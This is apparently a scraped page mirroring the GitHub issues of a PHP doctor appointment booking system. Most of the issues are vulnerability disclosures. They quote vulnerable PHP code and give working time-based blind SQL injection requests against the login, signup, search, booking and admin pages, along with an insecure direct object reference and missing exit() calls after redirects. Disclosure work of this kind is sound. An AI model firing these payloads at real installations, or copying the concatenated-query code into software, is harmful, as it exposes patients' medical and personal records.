hashenudara / edoc-doctor-appointment-system Goto Github PK

This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.

License: MIT License

PHP 95.27% CSS 4.28% HTML 0.46%

css doctor-appointment-management html mysql php sql appointment-scheduling appointment appointment-booking doctor-appointment-booking

edoc-doctor-appointment-system's Introduction

Hey there, I'm Hashen 👋🏻

Co-founder @xleron

A design-focused developer with a strong eye for aesthetics and a passion for crafting interactive and user-friendly web using technologies like Next.js, React, Tailwindcss & Webflow.

Who am I 👀

I thrive as a front-end developer, channeling my passion into creating remarkable web applications. My expertise lies in leveraging Next.js, React, & Node.js to build, fast, and scalable websites. I am committed to continuous learning and skill improvement within these domains, always striving to stay at the forefront of industry trends.

As a programming enthusiast, I have an insatiable appetite for knowledge and love to gather insights along my journey. Additionally, my design-focused approach ensures that I bring a keen sense of aesthetics to my projects, creating user-friendly experiences.

I'm really enjoying modern tech 🧑🏻‍💻

Tools In My Arsenal 🛠️

Feel free to explore some of my projects and repositories on this profile. If you have any questions, or feedback, or just want to connect, don't hesitate to reach out. I'm open to collaboration and always on the lookout for new opportunities.

Thanks for stopping by my profile, and let's ignite some sparks together!

edoc-doctor-appointment-system's People

Contributors

Stargazers

Watchers

Forkers

johntpy aframson romoaldodoliz kblogronio adeepabandara muhammad-midhlaj aswintb diptamoy-mitra umairahmadh abdulaziz-dev obify caseyspaulding macleanobore sourabh1428 obinnaobeleagu ambika-madan aniketzine73 sakhrihoussem vitordumont chaima-1 willie1953 saakai-dev brekooname abubakarsd azmihafif111 debjyotidas111 detayo chalory web-topup web-topup amiel-danao virushah minibu2020 suhaib33 vimal2046 akshitbansal010 otakenneth abixnash mvrcus salamalsam ronaldshaooo jagadeesh0247 wairuringechu kitokoh anaita1999 tejanimanan itdspa haryandi officialmsham mhsharkar2011 mehdiakram r-krishita salahnouari enishant alyairdinaazmel ylp1472 soumadipshyamm ameetroy iammohsami yoyox221 mhwh-dev rohkumsingh cyberdellix lyes-mersel nourajazbeh ars1002 balikowaumar12 pedrormiguel nish1502 yuanzhongqiao mobkogoo sajalgarg300 mkafg ayshafidhakr allanmuhari vr-1929 shageldi-dev mizirjx kathikcr sahabaj23799 melvinsalati louaykliai mohdfaridhashim matosdm ickemboi barakani mandeep7696 dappy211 rahneverd bernadettenakazibwe liwanzhong adityasingh-100 juveria-dalvi zzyzzy30 jennaide sehranmir ahmaddanish55 roshansingh517 tuxdere codinggeek29

edoc-doctor-appointment-system's Issues

Can we get in touch?

Hey HashenUdara,

I am writing a research paper about your website discussing a SQL-Injection vulnerability (CVE: CVE-2022-36543). My friend Pasqualle007 already provided the fix for it. I am interested in contacting you because I have some questions regarding your website. I would be very grateful for the opportunity to get in touch with you.

Best wishes

Alexej Kunz ~ Orchi1904

Blind sql injection in login page

page : login.php

https://github.com/HashenUdara/edoc-echanneling/blob/main/login.php#L48

Http request

POST /cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php HTTP/1.1
Host: localhost
Content-Length: 108
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=uqsd4tpq8bovkm9uadsfgvpjna
Connection: close

[email protected]' AND (SELECT 7037 FROM (SELECT(SLEEP(5)))FIpv) AND 'bqum'='bqum&userpassword=admin

Solution for Issue #9

Hey, I've got a solution for issue #9. Maybe you can drop me a message or email. I can't find any way to contact you :)

Found a vulnerability

Vulnerability file address

doctor/patient.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

doctor/patient.php from line 107,The $keyword parameter is controllable, the parameter search12 can be passed through post, and the $keyword is not protected from sql injection, line 151 $list11 = $database->query($sqlmain); causes sql injection

......
......
......
  if($_POST){

    if(isset($_POST["search"])){
      $keyword=$_POST["search12"];

      $sqlmain= "select * from patient where pemail='$keyword' or pname='$keyword' or pname like '$keyword%' or pname like '%$keyword' or pname like '%$keyword%' ";
      $selecttype="my";
    }
......
......
......

    <?php
      echo '<datalist id="patient">';
    $list11 = $database->query($sqlmain);
......
......
......

POC

POST /doctor/patient.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

search=1&search12=' AND (SELECT 3127 FROM (SELECT(SLEEP(5)))PKsU) AND 'rUxx'='rUxx

Attack results pictures

Found a vulnerability

Vulnerability file address

/patient/settings.php from line 238,when $id performs a query operation, it does not determine whether the id is the current user id, which makes it possible for a user to view the information of other users arbitrarily.

......
......
......
if($_GET){

  $id=$_GET["id"];
  $action=$_GET["action"];
......
......
......
elseif($action=='view'){
  $sqlmain= "select * from patient where pid='$id'";
  $result= $database->query($sqlmain);
  $row=$result->fetch_assoc();
  $name=$row["pname"];
  $email=$row["pemail"];
  $address=$row["paddress"];


  $dob=$row["pdob"];
  $nic=$row['pnic'];
  $tele=$row['ptel'];
......
......
......

POC

GET /patient/settings.php?action=view&id=1 HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=5b5upbno4c7dkhravnekcktsi6
Upgrade-Insecure-Requests: 1

Attack results pictures

Connection failed

Hi,
I have installed this repo but when I go to make appointment/login/register I obtain an error:

Connection failed: Access denied for user 'root'@'localhost'

Any solution?

Found a vulnerability

Vulnerability file address

patient/delete-appointment.php from line 3,the problem is at line 11 header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
  session_start();

if(isset($_SESSION["user"])){
  if(($_SESSION["user"])=="" or $_SESSION['usertype']!='a'){
    header("location: ../login.php");
  }

}else{
  header("location: ../login.php");
}
......
......
......

patient/delete-appointment.php from line 15,The $sheduledate parameter is controllable, the parameter sheduledate can be passed through post, and the $sheduledate is not protected from sql injection, line 21 $sql= $database->query("delete from appointment where appoid='$id';"); causes sql injection

if($_GET){
  //import database
  include("../connection.php");
  $id=$_GET["id"];
  //$result001= $database->query("select * from schedule where scheduleid=$id;");
  //$email=($result001->fetch_assoc())["docemail"];
  $sql= $database->query("delete from appointment where appoid='$id';");
  //$sql= $database->query("delete from doctor where docemail='$email';");
  //print_r($email);
  header("location: appointment.php");
}

POC

GET /patient/delete-appointment.php?id=777'+(SELECT 0x5371724d WHERE 2432=2432 AND (SELECT 5389 FROM (SELECT(SLEEP(5)))WZWf))+ HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

Attack results pictures

Found a vulnerability

Vulnerability file address

patient/booking-complete.php from line 27,The $scheduleid parameter is controllable, the parameter scheduleid can be passed through post, and the $scheduleid is not protected from sql injection, line 34 $result= $database->query($sql2); causes sql injection

......
......
......
if($_POST){
        if(isset($_POST["booknow"])){
            $apponum=$_POST["apponum"];
            $scheduleid=$_POST["scheduleid"];
            $date=$_POST["date"];
            $scheduleid=$_POST["scheduleid"];
            $sql2="insert into appointment(pid,apponum,scheduleid,appodate) values ($userid,$apponum,$scheduleid,'$date')";
            $result= $database->query($sql2);
            //echo $apponom;
            header("location: appointment.php?action=booking-added&id=".$apponum."&titleget=none");

        }
    }
......
......
......

POC

POST /patient/booking-complete.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

booknow=1&apponum=5&scheduleid=1&date=2022-08-05&scheduleid=2 AND (SELECT 7093 FROM (SELECT(SLEEP(5)))RWzN)

Attack results pictures

Found a vulnerability

Vulnerability file address

create-account.php from line 43,The $email parameter is controllable, the parameter newemail can be passed through post, and the $email is not protected from sql injection, line 59 $result= $database->query("select * from webuser where email='$email ';"); causes sql injection

......
......
......
if($_POST){

    $result= $database->query("select * from webuser");

    $fname=$_SESSION['personal']['fname'];
    $lname=$_SESSION['personal']['lname'];
    $name=$fname." ".$lname;
    $address=$_SESSION['personal']['address'];
    $nic=$_SESSION['personal']['nic'];
    $dob=$_SESSION['personal']['dob'];
    $email=$_POST['newemail'];
    $tele=$_POST['tele'];
    $newpassword=$_POST['newpassword'];
    $cpassword=$_POST['cpassword'];
    
    if ($newpassword==$cpassword){
        $result= $database->query("select * from webuser where email='$email';");
......
......
......

POC

POST /create-account.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/create-account.php
Cookie: PHPSESSID=oumjp2nqchjcrin2va1fh9n077
Upgrade-Insecure-Requests: 1

[email protected]' AND (SELECT 5395 FROM (SELECT(SLEEP(5)))Jkvf)-- erhH&tele=0712345678&newpassword=1&cpassword=1

Attack results pictures

Security.md recommendation

Dear HashenUdara!

Based on Github Recommendation, please add a Security.md file to be able to contact you with details of discovered vulnerabilities of your application.

Thanks for your cooperation!
Looking forward to hearing from you!

Found a vulnerability

Vulnerability file address

doctor/doctors.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

doctor/doctors.php from line 166,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 211 $result= $database->query($sqlmain); causes sql injection

......
......
......
if($_POST){
  $keyword=$_POST["search"];

  $sqlmain= "select * from doctor where docemail='$keyword' or docname='$keyword' or docname like '$keyword%' or docname like '%$keyword' or docname like '%$keyword%'";
}else{
  $sqlmain= "select * from doctor order by docid desc";

}
......
......
......

                                
  $result= $database->query($sqlmain);
......
......
......

POC

POST /doctor/doctors.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

search=1' AND (SELECT 7687 FROM (SELECT(SLEEP(5)))rWjf)-- xSIp

Attack results pictures

Found a vulnerability

Vulnerability file address

patient/schedule.php from line 117,The $keyword parameter is controllable, the parameter search can be passed through post, and the $keyword is not protected from sql injection, line 133 $result= $database->query($sqlmain) causes sql injection

......
......
......
if($_POST){
                        //print_r($_POST);
                        
                        if(!empty($_POST["search"])){
                            
                            $keyword=$_POST["search"];
                            $sqlmain= "select * from schedule inner join doctor on schedule.docid=doctor.docid where schedule.scheduledate>='$today' and (doctor.docname='$keyword' or doctor.docname like '$keyword%' or doctor.docname like '%$keyword' or doctor.docname like '%$keyword%' or schedule.title='$keyword' or schedule.title like '$keyword%' or schedule.title like '%$keyword' or schedule.title like '%$keyword%' or schedule.scheduledate like '$keyword%' or schedule.scheduledate like '%$keyword' or schedule.scheduledate like '%$keyword%' or schedule.scheduledate='$keyword' )  order by schedule.scheduledate asc";
                            //echo $sqlmain;
                            $insertkey=$keyword;
                            $searchtype="Search Result : ";
                            $q='"';
                        }

                    }


                $result= $database->query($sqlmain)
......
......
......

POC

POST /patient/schedule.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/patient/schedule.php
Cookie: PHPSESSID=4ciqg01m5iftqio69u3m5sha12
Upgrade-Insecure-Requests: 1

search=1' AND SLEEP(5) AND 'tklr'='tklr

Attack results pictures

Found a vulnerability

Vulnerability file address

patient/patient.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

patient/patient.php from line 106,The $keyword parameter is controllable, the parameter search12 can be passed through post, and the $keyword is not protected from sql injection, line 150 $list11 = $database->query($sqlmain); causes sql injection

......
......
......
  if($_POST){

    if(isset($_POST["search"])){
      $keyword=$_POST["search12"];

      $sqlmain= "select * from patient where pemail='$keyword' or pname='$keyword' or pname like '$keyword%' or pname like '%$keyword' or pname like '%$keyword%' ";
      $selecttype="my";
    }


    <?php
      echo '<datalist id="patient">';
    $list11 = $database->query($sqlmain);
......
......
......

POC

POST /patient/patient.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 82

search=1&search12=' AND (SELECT 3127 FROM (SELECT(SLEEP(2)))PKsU) AND 'rUxx'='rUxx

Attack results pictures

Found a vulnerability

Vulnerability file address

patient/appointment.php from line 54,The $sheduledate parameter is controllable, the parameter sheduledate can be passed through post, and the $sheduledate is not protected from sql injection, line 72 $result= $database->query($sqlmain); causes sql injection

......
......
......
if($_POST){
        //print_r($_POST);
        if(!empty($_POST["sheduledate"])){
            $sheduledate=$_POST["sheduledate"];
            $sqlmain.=" and schedule.scheduledate='$sheduledate' ";
        };
        //echo $sqlmain;
    }
    $sqlmain.="order by appointment.appodate  asc";
    $result= $database->query($sqlmain);
......
......
......

POC

POST /patient/appointment.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

sheduledate=1' AND (SELECT 3111 FROM (SELECT(SLEEP(5)))eooa)-- VhwP

Attack results pictures

Notify by Mail

Can I add a appoint notify by Mail

Found a vulnerability

patient/schedule.php

include("../connection.php");
$sqlmain= "select * from patient where pemail=?";
$stmt = $database->prepare($sqlmain);
$stmt->bind_param("s",$useremail);
$stmt->execute();
$result = $stmt->get_result();
$userfetch=$userrow->fetch_assoc();
$userid= $userfetch["pid"];
$username=$userfetch["pname"];`

Error: Warning: Undefined variable $userrow in /Applications/MAMP/htdocs/edoc/patient/schedule.php on line 47

Fatal error: Uncaught Error: Call to a member function fetch_assoc() on null in patient/schedule.php:47 Stack trace: #0 {main} patient/schedule.php on line 47

Found a vulnerability

admin/add-new.php from line 47, The $email parameter is controllable, the parameter email can be passed through post, and the $email is not protected from sql injection, line 54 $result= $database->query("select * from webuser where email='$email';"); causes sql injection

    if($_POST){
        //print_r($_POST);
        $result= $database->query("select * from webuser");
        $name=$_POST['name'];
        $nic=$_POST['nic'];
        $spec=$_POST['spec'];
        $email=$_POST['email'];
        $tele=$_POST['Tele'];
        $password=$_POST['password'];
        $cpassword=$_POST['cpassword'];
        
        if ($password==$cpassword){
            $error='3';
            $result= $database->query("select * from webuser where email='$email';");
            if($result->num_rows==1){
                $error='1';
            }else{

                $sql1="insert into doctor(docemail,docname,docpassword,docnic,doctel,specialties) values('$email','$name','$password','$nic','$tele',$spec);";
                $sql2="insert into webuser values('$email','d')";
                $database->query($sql1);
                $database->query($sql2);

                //echo $sql1;
                //echo $sql2;
                $error= '4';
                
            }
            
        }else{
            $error='2';
        }
    
    
        
        
    }else{
        //header('location: signup.php');
        $error='3';
    }

poc

POST /admin/add-new.php HTTP/1.1
Host: 192.168.0.104
Content-Length: 61
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.104/admin/doctors.php?action=add&error=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=mpu5jiv1ln63f3hrl1avff7if7
Connection: close

name=1&email=' AND (SELECT 7810 FROM (SELECT(SLEEP(5)))POrN) AND 'FCcW'='FCcW&nic=4&Tele=5&spec=1&password=6&cpassword=6

Attack results pictures

Found Stored Cross Site Scripting (XSS) vulnerability

detail : https://github.com/onEpAth936/cve/blob/master/bug_e/edoc-doctor-appointment-system/Stored%20Cross%20Site%20Scripting%20(XSS).md

Found multiple SQL injection vulnerabilities

detail : https://github.com/onEpAth936/cve/blob/master/bug_e/edoc-doctor-appointment-system/Multiple%20SQL%20injection.md

Hello developers, can you add a version number?

Found a vulnerability

Vulnerability file address

patient/edit-user.php from line 11,The $email parameter is controllable, the parameter email can be passed through post, and the $email is not protected from sql injection, line 27 $result= $database->query($aab); causes sql injection

......
......
......
  if($_POST){
        //print_r($_POST);
        $result= $database->query("select * from webuser");
        $name=$_POST['name'];
        $nic=$_POST['nic'];
        $oldemail=$_POST["oldemail"];
        $address=$_POST['address'];
        $email=$_POST['email'];
        $tele=$_POST['Tele'];
        $password=$_POST['password'];
        $cpassword=$_POST['cpassword'];
        $id=$_POST['id00'];
        
        if ($password==$cpassword){
            $error='3';
            $aab="select patient.pid from patient inner join webuser on patient.pemail=webuser.email where webuser.email='$email';";
            $result= $database->query($aab);
            //$resultqq= $database->query("select * from doctor where docid='$id';");
            if($result->num_rows==1){
                $id2=$result->fetch_assoc()["pid"];
......
......
......

POC

POST /patient/edit-user.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4ciqg01m5iftqio69u3m5sha12
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

email=' AND (SELECT 9021 FROM (SELECT(SLEEP(5)))BPzc)-- aeMt&password=1&cpassword=1

hashenudara / edoc-doctor-appointment-system Goto Github PK

edoc-doctor-appointment-system's Introduction

Hey there, I'm Hashen 👋🏻

Co-founder @xleron

Who am I 👀

I'm really enjoying modern tech 🧑🏻‍💻

Tools In My Arsenal 🛠️

edoc-doctor-appointment-system's People

Contributors

Stargazers

Watchers

Forkers

edoc-doctor-appointment-system's Issues

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Vulnerability file address

POC

Attack results pictures

poc

Attack results pictures

Vulnerability file address

POC

Attack results pictures

Recommend Projects

Recommend Topics

Recommend Org